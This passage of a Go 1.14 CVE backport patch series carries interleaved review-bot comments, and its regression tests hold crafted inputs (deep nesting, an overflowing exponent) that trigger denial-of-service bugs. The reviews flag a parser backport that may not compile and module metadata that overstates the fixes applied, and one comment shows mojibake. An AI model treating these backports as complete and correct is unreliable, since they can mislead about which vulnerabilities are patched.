+ golang.org/x/sys v0.0.0-20200201011859-915c9c3d4ccf h1:+4j7oujXP478CVb/AFvHJmVX5+Pczx2NGts5yirA0oY=
+diff --git a/src/net/http/h2_bundle.go b/src/net/http/h2_bundle.go
+index 702fd5a..83f2a72 100644
+--- a/src/net/http/h2_bundle.go
++++ b/src/net/http/h2_bundle.go
+@@ -4293,7 +4293,15 @@ func (sc *http2serverConn) canonicalHeader(v string) string {
+ sc.canonHeader = make(map[string]string)
+ }
+ cv = CanonicalHeaderKey(v)
+- sc.canonHeader[v] = cv
++ // maxCachedCanonicalHeaders is an arbitrarily-chosen limit on the number of
++ // entries in the canonHeader cache. This should be larger than the number
++ // of unique, uncommon header keys likely to be sent by the peer, while not
++ // so high as to permit unreaasonable memory usage if the peer sends an unbounded
++ // number of unique header keys.
++ const maxCachedCanonicalHeaders = 32
++ if len(sc.canonHeader) < maxCachedCanonicalHeaders {
++ sc.canonHeader[v] = cv
++ }
+ return cv
+ }
+
+diff --git a/src/vendor/modules.txt b/src/vendor/modules.txt
+index 669bd9b..1d67183 100644
+--- a/src/vendor/modules.txt
++++ b/src/vendor/modules.txt
+@@ -8,7 +8,7 @@ golang.org/x/crypto/curve25519
+ golang.org/x/crypto/hkdf
+ golang.org/x/crypto/internal/subtle
+ golang.org/x/crypto/poly1305
+-# golang.org/x/net v0.0.0-20210129194117-4acb7895a057
++# golang.org/x/net v0.0.0-20211209100217-a5309b321dca
+ ## explicit
+ golang.org/x/net/dns/dnsmessage
+ golang.org/x/net/http/httpguts
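Review bot: The `go.mod`, `go.sum` and `vendor/modules.txt` hunks advance the declared `golang.org/x/net` pseudo-version from `20210129194117-4acb7895a057` to `20211209100217-a5309b321dca`, while the only source change in this patch is the cache cap in `canonicalHeader` in `h2_bundle.go`. If the rest of the bundled and vendored x/net code in this go-1.14 tree is not already at that revision, the module metadata (and any SBOM or scanner that reads it) will report fixes that are not actually present. I would state the scope in the patch header, e.g. `Only the canonicalHeader cache cap from a5309b3 is applied; other x/net changes up to that revision are not part of this backport.`, or drop the three metadata hunks. The cap itself limits the number of cached keys (32), not their size, and the added comment carries the typo `unreaasonable`.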
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch
new file mode 100644
index 0000000000..17cac7a5ba
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch
@@ -0,0 +1,83 @@
+From 9171c664e7af479aa26bc72f2e7cf4e69d8e0a6f Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 17 Jun 2022 10:22:47 +0530
+Subject: [PATCH] CVE-2021-44717
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/44a3fb49]
+CVE: CVE-2021-44717
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+syscall: fix ForkLock spurious close(0) on pipe failure
+Pipe (and therefore forkLockPipe) does not make any guarantees
+about the state of p after a failed Pipe(p). Avoid that assumption
+and the too-clever goto, so that we don't accidentally Close a real fd
+if the failed pipe leaves p[0] or p[1] set >= 0.
+
+Updates #50057
+Fixes CVE-2021-44717
+
+Change-Id: Iff8e19a6efbba0c73cc8b13ecfae381c87600bb4
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1291270
+Reviewed-by: Ian Lance Taylor <iant@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/370514
+Trust: Filippo Valsorda <filippo@golang.org>
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Alex Rakoczy <alex@golang.org>
+---
+ src/syscall/exec_unix.go | 20 ++++++--------------
+ 1 file changed, 6 insertions(+), 14 deletions(-)
+
+diff --git a/src/syscall/exec_unix.go b/src/syscall/exec_unix.go
+index b3798b6..b73782c 100644
+--- a/src/syscall/exec_unix.go
++++ b/src/syscall/exec_unix.go
+@@ -151,9 +151,6 @@ func forkExec(argv0 string, argv []string, attr *ProcAttr) (pid int, err error)
+ sys = &zeroSysProcAttr
+ }
+
+- p[0] = -1
+- p[1] = -1
+-
+ // Convert args to C form.
+ argv0p, err := BytePtrFromString(argv0)
+ if err != nil {
+@@ -194,14 +191,17 @@ func forkExec(argv0 string, argv []string, attr *ProcAttr) (pid int, err error)
+
+ // Allocate child status pipe close on exec.
+ if err = forkExecPipe(p[:]); err != nil {
+- goto error
++ ForkLock.Unlock()
++ return 0, err
+ }
+
+ // Kick off child.
+ pid, err1 = forkAndExecInChild(argv0p, argvp, envvp, chroot, dir, attr, sys, p[1])
+ if err1 != 0 {
+- err = Errno(err1)
+- goto error
++ Close(p[0])
++ Close(p[1])
++ ForkLock.Unlock()
++ return 0, Errno(err1)
+ }
+ ForkLock.Unlock()
+
+@@ -228,14 +228,6 @@ func forkExec(argv0 string, argv []string, attr *ProcAttr) (pid int, err error)
+
+ // Read got EOF, so pipe closed on exec, so exec succeeded.
+ return pid, nil
+-
+-error:
+- if p[0] >= 0 {
+- Close(p[0])
+- Close(p[1])
+- }
+- ForkLock.Unlock()
+- return 0, err
+ }
+
+ // Combination of fork and exec, careful to be thread safe.
+--
+2.25.1
+
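Review bot: The reason the `forkExecPipe` failure path in `forkExec` no longer closes `p[0]`/`p[1]` is recorded only in the commit message, so the new branch reads as if a cleanup was forgotten. A short comment above `ForkLock.Unlock()` in that branch would keep a later refactor from reintroducing the close, for example `// forkExecPipe makes no guarantee about p on failure; do not Close p[0] or p[1] here.` The patch header also uses the bare CVE id as `Subject:` and places the upstream summary line after the tags, which makes the backport harder to match to upstream commit 44a3fb49 in log views. `forkExec` starts and ends outside the hunks shown.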
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch
new file mode 100644
index 0000000000..b2ab5d0669
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch
@@ -0,0 +1,357 @@
+From ba8788ebcead55e99e631c6a1157ad7b35535d11 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Wed, 15 Jun 2022 10:43:05 -0700
+Subject: [PATCH] [release-branch.go1.17] go/parser: limit recursion depth
+
+Limit nested parsing to 100,000, which prevents stack exhaustion when
+parsing deeply nested statements, types, and expressions. Also limit
+the scope depth to 1,000 during object resolution.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Fixes #53707
+Updates #53616
+Fixes CVE-2022-1962
+
+Change-Id: I4d7b86c1d75d0bf3c7af1fdea91582aa74272c64
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1491025
+Reviewed-by: Russ Cox <rsc@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 6a856f08d58e4b6705c0c337d461c540c1235c83)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/417070
+Reviewed-by: Heschi Kreinick <heschi@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/ba8788ebcead55e99e631c6a1157ad7b35535d11]
+CVE: CVE-2022-1962
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/go/parser/interface.go | 10 ++-
+ src/go/parser/parser.go | 48 ++++++++--
+ src/go/parser/parser_test.go | 169 +++++++++++++++++++++++++++++++++++
+ 3 files changed, 220 insertions(+), 7 deletions(-)
+
+diff --git a/src/go/parser/interface.go b/src/go/parser/interface.go
+index 54f9d7b..537b327 100644
+--- a/src/go/parser/interface.go
++++ b/src/go/parser/interface.go
+@@ -92,8 +92,11 @@ func ParseFile(fset *token.FileSet, filename string, src interface{}, mode Mode)
+ defer func() {
+ if e := recover(); e != nil {
+ // resume same panic if it's not a bailout
+- if _, ok := e.(bailout); !ok {
++ bail, ok := e.(bailout)
++ if !ok {
+ panic(e)
++ } else if bail.msg != "" {
++ p.errors.Add(p.file.Position(bail.pos), bail.msg)
+ }
+ }
+
+@@ -188,8 +191,11 @@ func ParseExprFrom(fset *token.FileSet, filename string, src interface{}, mode M
+ defer func() {
+ if e := recover(); e != nil {
+ // resume same panic if it's not a bailout
+- if _, ok := e.(bailout); !ok {
++ bail, ok := e.(bailout)
++ if !ok {
+ panic(e)
++ } else if bail.msg != "" {
++ p.errors.Add(p.file.Position(bail.pos), bail.msg)
+ }
+ }
+ p.errors.Sort()
+diff --git a/src/go/parser/parser.go b/src/go/parser/parser.go
+index 31a7398..586fe90 100644
+--- a/src/go/parser/parser.go
++++ b/src/go/parser/parser.go
+@@ -64,6 +64,10 @@ type parser struct {
+ unresolved []*ast.Ident // unresolved identifiers
+ imports []*ast.ImportSpec // list of imports
+
++ // nestLev is used to track and limit the recursion depth
++ // during parsing.
++ nestLev int
++
+ // Label scopes
+ // (maintained by open/close LabelScope)
+ labelScope *ast.Scope // label scope for current function
+@@ -236,6 +240,24 @@ func un(p *parser) {
+ p.printTrace(")")
+ }
+
++// maxNestLev is the deepest we're willing to recurse during parsing
++const maxNestLev int = 1e5
++
++func incNestLev(p *parser) *parser {
++ p.nestLev++
++ if p.nestLev > maxNestLev {
++ p.error(p.pos, "exceeded max nesting depth")
++ panic(bailout{})
++ }
++ return p
++}
++
++// decNestLev is used to track nesting depth during parsing to prevent stack exhaustion.
++// It is used along with incNestLev in a similar fashion to how un and trace are used.
++func decNestLev(p *parser) {
++ p.nestLev--
++}
++
+ // Advance to the next token.
+ func (p *parser) next0() {
+ // Because of one-token look-ahead, print the previous token
+@@ -348,8 +370,12 @@ func (p *parser) next() {
+ }
+ }
+
+-// A bailout panic is raised to indicate early termination.
+-type bailout struct{}
++// A bailout panic is raised to indicate early termination. pos and msg are
++// only populated when bailing out of object resolution.
++type bailout struct {
++ pos token.Pos
++ msg string
++}
+
+ func (p *parser) error(pos token.Pos, msg string) {
+ epos := p.file.Position(pos)
+@@ -1030,6 +1056,8 @@ func (p *parser) parseChanType() *ast.ChanType {
+
+ // If the result is an identifier, it is not resolved.
+ func (p *parser) tryIdentOrType() ast.Expr {
++ defer decNestLev(incNestLev(p))
++
+ switch p.tok {
+ case token.IDENT:
+ return p.parseTypeName()
+@@ -1609,7 +1637,13 @@ func (p *parser) parseBinaryExpr(lhs bool, prec1 int) ast.Expr {
+ }
+
+ x := p.parseUnaryExpr(lhs)
+- for {
++ // We track the nesting here rather than at the entry for the function,
++ // since it can iteratively produce a nested output, and we want to
++ // limit how deep a structure we generate.
++ var n int
++ defer func() { p.nestLev -= n }()
++ for n = 1; ; n++ {
++ incNestLev(p)
+ op, oprec := p.tokPrec()
+ if oprec < prec1 {
+ return x
+@@ -1628,7 +1662,7 @@ func (p *parser) parseBinaryExpr(lhs bool, prec1 int) ast.Expr {
+ // The result may be a type or even a raw type ([...]int). Callers must
+ // check the result (using checkExpr or checkExprOrType), depending on
+ // context.
+-func (p *parser) parseExpr(lhs bool) ast.Expr {
++func (p *parser) parseExpr(lhs bool) ast.Expr {
+ if p.trace {
+ defer un(trace(p, "Expression"))
+ }
+@@ -1899,6 +1933,8 @@ func (p *parser) parseIfHeader() (init ast.Stmt, cond ast.Expr) {
+ }
+
+ func (p *parser) parseIfStmt() *ast.IfStmt {
++ defer decNestLev(incNestLev(p))
++
+ if p.trace {
+ defer un(trace(p, "IfStmt"))
+ }
+@@ -2214,6 +2250,8 @@ func (p *parser) parseForStmt() ast.Stmt {
+ }
+
+ func (p *parser) parseStmt() (s ast.Stmt) {
++ defer decNestLev(incNestLev(p))
++
+ if p.trace {
+ defer un(trace(p, "Statement"))
+ }
+diff --git a/src/go/parser/parser_test.go b/src/go/parser/parser_test.go
+index 25a374e..37a6a2b 100644
+--- a/src/go/parser/parser_test.go
++++ b/src/go/parser/parser_test.go
+@@ -10,6 +10,7 @@ import (
+ "go/ast"
+ "go/token"
+ "os"
++ "runtime"
+ "strings"
+ "testing"
+ )
+@@ -569,3 +570,171 @@ type x int // comment
+ t.Errorf("got %q, want %q", comment, "// comment")
+ }
+ }
++
++var parseDepthTests = []struct {
++ name string
++ format string
++ // multipler is used when a single statement may result in more than one
++ // change in the depth level, for instance "1+(..." produces a BinaryExpr
++ // followed by a UnaryExpr, which increments the depth twice. The test
++ // case comment explains which nodes are triggering the multiple depth
++ // changes.
++ parseMultiplier int
++ // scope is true if we should also test the statement for the resolver scope
++ // depth limit.
++ scope bool
++ // scopeMultiplier does the same as parseMultiplier, but for the scope
++ // depths.
++ scopeMultiplier int
++}{
++ // The format expands the part inside « » many times.
++ // A second set of brackets nested inside the first stops the repetition,
++ // so that for example «(«1»)» expands to (((...((((1))))...))).
++ {name: "array", format: "package main; var x «[1]»int"},
++ {name: "slice", format: "package main; var x «[]»int"},
++ {name: "struct", format: "package main; var x «struct { X «int» }»", scope: true},
++ {name: "pointer", format: "package main; var x «*»int"},
++ {name: "func", format: "package main; var x «func()»int", scope: true},
++ {name: "chan", format: "package main; var x «chan »int"},
++ {name: "chan2", format: "package main; var x «<-chan »int"},
++ {name: "interface", format: "package main; var x «interface { M() «int» }»", scope: true, scopeMultiplier: 2}, // Scopes: InterfaceType, FuncType
++ {name: "map", format: "package main; var x «map[int]»int"},
++ {name: "slicelit", format: "package main; var x = «[]any{«»}»", parseMultiplier: 2}, // Parser nodes: UnaryExpr, CompositeLit
++ {name: "arraylit", format: "package main; var x = «[1]any{«nil»}»", parseMultiplier: 2}, // Parser nodes: UnaryExpr, CompositeLit
++ {name: "structlit", format: "package main; var x = «struct{x any}{«nil»}»", parseMultiplier: 2}, // Parser nodes: UnaryExpr, CompositeLit
++ {name: "maplit", format: "package main; var x = «map[int]any{1:«nil»}»", parseMultiplier: 2}, // Parser nodes: CompositeLit, KeyValueExpr
++ {name: "dot", format: "package main; var x = «x.»x"},
++ {name: "index", format: "package main; var x = x«[1]»"},
++ {name: "slice", format: "package main; var x = x«[1:2]»"},
++ {name: "slice3", format: "package main; var x = x«[1:2:3]»"},
++ {name: "dottype", format: "package main; var x = x«.(any)»"},
++ {name: "callseq", format: "package main; var x = x«()»"},
++ {name: "methseq", format: "package main; var x = x«.m()»", parseMultiplier: 2}, // Parser nodes: SelectorExpr, CallExpr
++ {name: "binary", format: "package main; var x = «1+»1"},
++ {name: "binaryparen", format: "package main; var x = «1+(«1»)»", parseMultiplier: 2}, // Parser nodes: BinaryExpr, ParenExpr
++ {name: "unary", format: "package main; var x = «^»1"},
++ {name: "addr", format: "package main; var x = «& »x"},
++ {name: "star", format: "package main; var x = «*»x"},
++ {name: "recv", format: "package main; var x = «<-»x"},
++ {name: "call", format: "package main; var x = «f(«1»)»", parseMultiplier: 2}, // Parser nodes: Ident, CallExpr
++ {name: "conv", format: "package main; var x = «(*T)(«1»)»", parseMultiplier: 2}, // Parser nodes: ParenExpr, CallExpr
++ {name: "label", format: "package main; func main() { «Label:» }"},
++ {name: "if", format: "package main; func main() { «if true { «» }»}", parseMultiplier: 2, scope: true, scopeMultiplier: 2}, // Parser nodes: IfStmt, BlockStmt. Scopes: IfStmt, BlockStmt
++ {name: "ifelse", format: "package main; func main() { «if true {} else » {} }", scope: true},
++ {name: "switch", format: "package main; func main() { «switch { default: «» }»}", scope: true, scopeMultiplier: 2}, // Scopes: TypeSwitchStmt, CaseClause
++ {name: "typeswitch", format: "package main; func main() { «switch x.(type) { default: «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: TypeSwitchStmt, CaseClause
++ {name: "for0", format: "package main; func main() { «for { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: ForStmt, BlockStmt
++ {name: "for1", format: "package main; func main() { «for x { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: ForStmt, BlockStmt
++ {name: "for3", format: "package main; func main() { «for f(); g(); h() { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: ForStmt, BlockStmt
++ {name: "forrange0", format: "package main; func main() { «for range x { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: RangeStmt, BlockStmt
++ {name: "forrange1", format: "package main; func main() { «for x = range z { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: RangeStmt, BlockStmt
++ {name: "forrange2", format: "package main; func main() { «for x, y = range z { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: RangeStmt, BlockStmt
++ {name: "go", format: "package main; func main() { «go func() { «» }()» }", parseMultiplier: 2, scope: true}, // Parser nodes: GoStmt, FuncLit
++ {name: "defer", format: "package main; func main() { «defer func() { «» }()» }", parseMultiplier: 2, scope: true}, // Parser nodes: DeferStmt, FuncLit
++ {name: "select", format: "package main; func main() { «select { default: «» }» }", scope: true},
++}
++
++// split splits pre«mid»post into pre, mid, post.
++// If the string does not have that form, split returns x, "", "".
++func split(x string) (pre, mid, post string) {
++ start, end := strings.Index(x, "«"), strings.LastIndex(x, "»")
++ if start < 0 || end < 0 {
++ return x, "", ""
++ }
++ return x[:start], x[start+len("«") : end], x[end+len("»"):]
++}
++
++func TestParseDepthLimit(t *testing.T) {
++ if runtime.GOARCH == "wasm" {
++ t.Skip("causes call stack exhaustion on js/wasm")
++ }
++ for _, tt := range parseDepthTests {
++ for _, size := range []string{"small", "big"} {
++ t.Run(tt.name+"/"+size, func(t *testing.T) {
++ n := maxNestLev + 1
++ if tt.parseMultiplier > 0 {
++ n /= tt.parseMultiplier
++ }
++ if size == "small" {
++ // Decrease the number of statements by 10, in order to check
++ // that we do not fail when under the limit. 10 is used to
++ // provide some wiggle room for cases where the surrounding
++ // scaffolding syntax adds some noise to the depth that changes
++ // on a per testcase basis.
++ n -= 10
++ }
++
++ pre, mid, post := split(tt.format)
++ if strings.Contains(mid, "«") {
++ left, base, right := split(mid)
++ mid = strings.Repeat(left, n) + base + strings.Repeat(right, n)
++ } else {
++ mid = strings.Repeat(mid, n)
++ }
++ input := pre + mid + post
++
++ fset := token.NewFileSet()
++ _, err := ParseFile(fset, "", input, ParseComments|SkipObjectResolution)
++ if size == "small" {
++ if err != nil {
++ t.Errorf("ParseFile(...): %v (want success)", err)
++ }
++ } else {
++ expected := "exceeded max nesting depth"
++ if err == nil || !strings.HasSuffix(err.Error(), expected) {
++ t.Errorf("ParseFile(...) = _, %v, want %q", err, expected)
++ }
++ }
++ })
++ }
++ }
++}
++
++func TestScopeDepthLimit(t *testing.T) {
++ if runtime.GOARCH == "wasm" {
++ t.Skip("causes call stack exhaustion on js/wasm")
++ }
++ for _, tt := range parseDepthTests {
++ if !tt.scope {
++ continue
++ }
++ for _, size := range []string{"small", "big"} {
++ t.Run(tt.name+"/"+size, func(t *testing.T) {
++ n := maxScopeDepth + 1
++ if tt.scopeMultiplier > 0 {
++ n /= tt.scopeMultiplier
++ }
++ if size == "small" {
++ // Decrease the number of statements by 10, in order to check
++ // that we do not fail when under the limit. 10 is used to
++ // provide some wiggle room for cases where the surrounding
++ // scaffolding syntax adds some noise to the depth that changes
++ // on a per testcase basis.
++ n -= 10
++ }
++
++ pre, mid, post := split(tt.format)
++ if strings.Contains(mid, "«") {
++ left, base, right := split(mid)
++ mid = strings.Repeat(left, n) + base + strings.Repeat(right, n)
++ } else {
++ mid = strings.Repeat(mid, n)
++ }
++ input := pre + mid + post
++
++ fset := token.NewFileSet()
++ _, err := ParseFile(fset, "", input, DeclarationErrors)
++ if size == "small" {
++ if err != nil {
++ t.Errorf("ParseFile(...): %v (want success)", err)
++ }
++ } else {
++ expected := "exceeded max scope depth during object resolution"
++ if err == nil || !strings.HasSuffix(err.Error(), expected) {
++ t.Errorf("ParseFile(...) = _, %v, want %q", err, expected)
++ }
++ }
++ })
++ }
++ }
++}
+--
+2.30.2
+
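Review bot: The backported `TestScopeDepthLimit` in parser_test.go uses `maxScopeDepth`, and `TestParseDepthLimit` passes `SkipObjectResolution`, but neither identifier is added anywhere in this patch, whose diffstat touches only interface.go, parser.go and parser_test.go. Unless the go-1.14 tree already defines both, the `go/parser` test package will no longer compile, and the 1,000-level scope limit promised in the commit message is not implemented by the parser.go hunks (only `maxNestLev` is). For the same reason the new `bail.msg != ""` branches in interface.go look unreachable here, since the only `panic` the patch adds is `panic(bailout{})`. I would drop `TestScopeDepthLimit` from the backport, change the mode argument to `ParseComments`, and say in the header that only the nesting limit is backported. The `parseExpr` signature hunk removes and re-adds a visually identical line and could be dropped.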
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch
new file mode 100644
index 0000000000..f0daee3624
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch
@@ -0,0 +1,50 @@
+From 70882eedccac803ddcf1c3215e0ae8fd59847e39 Mon Sep 17 00:00:00 2001
+From: Katie Hockman <katie@golang.org>
+Date: Sat, 26 Feb 2022 20:03:38 +0000
+Subject: [PATCH] [release-branch.go1.16] math/big: prevent overflow in
+ (*Rat).SetString
+
+Credit to rsc@ for the original patch.
+
+Thanks to the OSS-Fuzz project for discovering this
+issue and to Emmanuel Odeke (@odeke_et) for reporting it.
+
+Updates #50699
+Fixes #50700
+Fixes CVE-2022-23772
+---
+ src/math/big/ratconv.go | 5 +++++
+ src/math/big/ratconv_test.go | 1 +
+ 2 files changed, 6 insertions(+)
+
+diff --git a/src/math/big/ratconv.go b/src/math/big/ratconv.go
+index 941139e..e8cbdbe 100644
+--- a/src/math/big/ratconv.go
++++ b/src/math/big/ratconv.go
+@@ -168,6 +168,11 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
+ n := exp5
+ if n < 0 {
+ n = -n
++ if n < 0 {
++ // This can occur if -n overflows. -(-1 << 63) would become
++ // -1 << 63, which is still negative.
++ return nil, false
++ }
+ }
+ pow5 := z.b.abs.expNN(natFive, nat(nil).setWord(Word(n)), nil) // use underlying array of z.b.abs
+ if exp5 > 0 {
+diff --git a/src/math/big/ratconv_test.go b/src/math/big/ratconv_test.go
+index ba0d1ba..b820df4 100644
+--- a/src/math/big/ratconv_test.go
++++ b/src/math/big/ratconv_test.go
+@@ -104,6 +104,7 @@ var setStringTests = []StringTest{
+ {in: "4/3/"},
+ {in: "4/3."},
+ {in: "4/"},
++ {in: "13e-9223372036854775808"}, // CVE-2022-23772
+
+ // valid
+ {"0", "0", true},
+--
+2.17.1
+
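Review bot: The header of this patch ends at `Fixes CVE-2022-23772` and carries no `Upstream-Status:`, `CVE:` or `Signed-off-by:` line, unlike the other Go CVE patches added alongside it. Without them the backport cannot be traced to its upstream commit, and tooling that relies on the `CVE:` tag and not the file name will not credit the fix. I would add, before the `---` separator, `Upstream-Status: Backport [<upstream commit URL>]`, `CVE: CVE-2022-23772` and `Signed-off-by: <backporter name and address>`.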
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch
new file mode 100644
index 0000000000..772acdcbf6
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch
@@ -0,0 +1,142 @@
+From 5b376a209d1c61e10847e062d78c4b1aa90dff0c Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Sat, 26 Feb 2022 10:40:57 +0000
+Subject: [PATCH] crypto/elliptic: make IsOnCurve return false for invalid
+
+ field elements
+
+Updates #50974
+Fixes #50977
+Fixes CVE-2022-23806
+
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+
+---
+ src/crypto/elliptic/elliptic.go | 6 +++
+ src/crypto/elliptic/elliptic_test.go | 81 ++++++++++++++++++++++++++++
+ src/crypto/elliptic/p224.go | 6 +++
+ 3 files changed, 93 insertions(+)
+
+diff --git a/src/crypto/elliptic/elliptic.go b/src/crypto/elliptic/elliptic.go
+index e2f71cd..bd574a4 100644
+--- a/src/crypto/elliptic/elliptic.go
++++ b/src/crypto/elliptic/elliptic.go
+@@ -53,6 +53,12 @@ func (curve *CurveParams) Params() *CurveParams {
+ }
+
+ func (curve *CurveParams) IsOnCurve(x, y *big.Int) bool {
++
++ if x.Sign() < 0 || x.Cmp(curve.P) >= 0 ||
++ y.Sign() < 0 || y.Cmp(curve.P) >= 0 {
++ return false
++ }
++
+ // y² = x³ - 3x + b
+ y2 := new(big.Int).Mul(y, y)
+ y2.Mod(y2, curve.P)
+diff --git a/src/crypto/elliptic/elliptic_test.go b/src/crypto/elliptic/elliptic_test.go
+index 09c5483..b13a620 100644
+--- a/src/crypto/elliptic/elliptic_test.go
++++ b/src/crypto/elliptic/elliptic_test.go
+@@ -628,3 +628,84 @@ func TestUnmarshalToLargeCoordinates(t *testing.T) {
+ t.Errorf("Unmarshal accepts invalid Y coordinate")
+ }
+ }
++
++func testAllCurves(t *testing.T, f func(*testing.T, Curve)) {
++ tests := []struct {
++ name string
++ curve Curve
++ }{
++ {"P256", P256()},
++ {"P256/Params", P256().Params()},
++ {"P224", P224()},
++ {"P224/Params", P224().Params()},
++ {"P384", P384()},
++ {"P384/Params", P384().Params()},
++ {"P521", P521()},
++ {"P521/Params", P521().Params()},
++ }
++ if testing.Short() {
++ tests = tests[:1]
++ }
++ for _, test := range tests {
++ curve := test.curve
++ t.Run(test.name, func(t *testing.T) {
++ t.Parallel()
++ f(t, curve)
++ })
++ }
++}
++
++// TestInvalidCoordinates tests big.Int values that are not valid field elements
++// (negative or bigger than P). They are expected to return false from
++// IsOnCurve, all other behavior is undefined.
++func TestInvalidCoordinates(t *testing.T) {
++ testAllCurves(t, testInvalidCoordinates)
++}
++
++func testInvalidCoordinates(t *testing.T, curve Curve) {
++ checkIsOnCurveFalse := func(name string, x, y *big.Int) {
++ if curve.IsOnCurve(x, y) {
++ t.Errorf("IsOnCurve(%s) unexpectedly returned true", name)
++ }
++ }
++
++ p := curve.Params().P
++ _, x, y, _ := GenerateKey(curve, rand.Reader)
++ xx, yy := new(big.Int), new(big.Int)
++
++ // Check if the sign is getting dropped.
++ xx.Neg(x)
++ checkIsOnCurveFalse("-x, y", xx, y)
++ yy.Neg(y)
++ checkIsOnCurveFalse("x, -y", x, yy)
++
++ // Check if negative values are reduced modulo P.
++ xx.Sub(x, p)
++ checkIsOnCurveFalse("x-P, y", xx, y)
++ yy.Sub(y, p)
++ checkIsOnCurveFalse("x, y-P", x, yy)
++
++ // Check if positive values are reduced modulo P.
++ xx.Add(x, p)
++ checkIsOnCurveFalse("x+P, y", xx, y)
++ yy.Add(y, p)
++ checkIsOnCurveFalse("x, y+P", x, yy)
++
++ // Check if the overflow is dropped.
++ xx.Add(x, new(big.Int).Lsh(big.NewInt(1), 535))
++ checkIsOnCurveFalse("x+2âµÂ³âµ, y", xx, y)
++ yy.Add(y, new(big.Int).Lsh(big.NewInt(1), 535))
++ checkIsOnCurveFalse("x, y+2âµÂ³âµ", x, yy)
++
++ // Check if P is treated like zero (if possible).
++ // y^2 = x^3 - 3x + B
++ // y = mod_sqrt(x^3 - 3x + B)
++ // y = mod_sqrt(B) if x = 0
++ // If there is no modsqrt, there is no point with x = 0, can't test x = P.
++ if yy := new(big.Int).ModSqrt(curve.Params().B, p); yy != nil {
++ if !curve.IsOnCurve(big.NewInt(0), yy) {
++ t.Fatal("(0, mod_sqrt(B)) is not on the curve?")
++ }
++ checkIsOnCurveFalse("P, y", p, yy)
++ }
++}
+diff --git a/src/crypto/elliptic/p224.go b/src/crypto/elliptic/p224.go
+index 8c76021..f1bfd7e 100644
+--- a/src/crypto/elliptic/p224.go
++++ b/src/crypto/elliptic/p224.go
+@@ -48,6 +48,12 @@ func (curve p224Curve) Params() *CurveParams {
+ }
+
+ func (curve p224Curve) IsOnCurve(bigX, bigY *big.Int) bool {
++
++ if bigX.Sign() < 0 || bigX.Cmp(curve.P) >= 0 ||
++ bigY.Sign() < 0 || bigY.Cmp(curve.P) >= 0 {
++ return false
++ }
++
+ var x, y p224FieldElement
+ p224FromBig(&x, bigX)
+ p224FromBig(&y, bigY)
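Review bot: The range guard added at the top of both `IsOnCurve` implementations (elliptic.go and p224.go) has no comment saying why it is there, and a later reader could take it for redundant with the modular arithmetic that follows. A one-line comment above each guard would do, for example `// Reject coordinates outside [0, P): they are not field elements and must not be reduced modulo P into valid ones.` Both function bodies continue outside the inner hunks, so how the rest of the check treats such values is not visible here. The added `testAllCurves` also trims its table to P256 under `testing.Short()`, which leaves the p224.go guard untested in short runs.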
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch
new file mode 100644
index 0000000000..4bc012be21
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch
@@ -0,0 +1,271 @@
+From 1eb931d60a24501a9668e5cb4647593e19115507 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 17 Jun 2022 12:22:53 +0530
+Subject: [PATCH] CVE-2022-24675
+
+Upstream-Status: Backport [https://go-review.googlesource.com/c/go/+/399816/]
+CVE: CVE-2022-24675
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/encoding/pem/pem.go | 174 +++++++++++++++--------------------
+ src/encoding/pem/pem_test.go | 28 +++++-
+ 2 files changed, 101 insertions(+), 101 deletions(-)
+
+diff --git a/src/encoding/pem/pem.go b/src/encoding/pem/pem.go
+index a7272da..1bee1c1 100644
+--- a/src/encoding/pem/pem.go
++++ b/src/encoding/pem/pem.go
+@@ -87,123 +87,97 @@ func Decode(data []byte) (p *Block, rest []byte) {
+ // pemStart begins with a newline. However, at the very beginning of
+ // the byte array, we'll accept the start string without it.
+ rest = data
+- if bytes.HasPrefix(data, pemStart[1:]) {
+- rest = rest[len(pemStart)-1 : len(data)]
